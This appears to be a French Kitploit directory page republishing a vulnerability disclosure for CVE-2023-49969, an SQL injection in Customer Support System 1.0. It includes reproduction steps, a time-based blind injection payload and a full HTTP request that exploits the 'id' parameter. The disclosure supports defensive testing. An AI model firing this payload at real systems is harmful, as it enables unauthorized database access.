Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/geraldoalcantara/cve-2023-49969
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionSécurité des Bases de Données
GitHubgeraldoalcantara/cve-2023-49969

CVE-2023-49969

Système de support client 1.0 - Vulnérabilité d'injection SQL dans edit_customer via le paramètre URL "id"

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-49969

Customer Support System 1.0 - Vulnérabilité d'injection SQL dans edit_customer via le paramètre 'id' de l'URL

Description : Une vulnérabilité d'injection SQL existe dans la version 1 du Système de Support Client. Un attaquant malveillant peut exécuter des commandes SQL sur la base de données MySQL en manipulant le paramètre 'id' de l'URL lors de l'édition d'un client.

Version du produit vulnérable : Customer Support System 1.0
Auteur du CVE : Geraldo Alcântara
Date : 28/11/2023
Confirmé le : 19/12/2023
CVE : CVE-2023-49969
Testé sur : Windows

Étapes pour reproduire :

1- Connectez-vous à l'application.
2- Accédez à la page customer_list, cliquez sur le bouton 'Action' et sélectionnez 'Edit'.
3- Le paramètre 'id' sera passé, permettant l'insertion d'une charge utile malveillante.
payload : (select*from(select(sleep(5)))a)

Requête

root@kitploit:~
GET /customer_support/index.php?page=edit_customer&id=(select*from(select(sleep(5)))a HTTP/1.1
Host: 192.168.68.182
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://192.168.68.182/customer_support/index.php?page=customer_list
Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n
Upgrade-Insecure-Requests: 1

Découvreur(s)/Crédits :
Geraldo Alcântara

Télécharger l’outil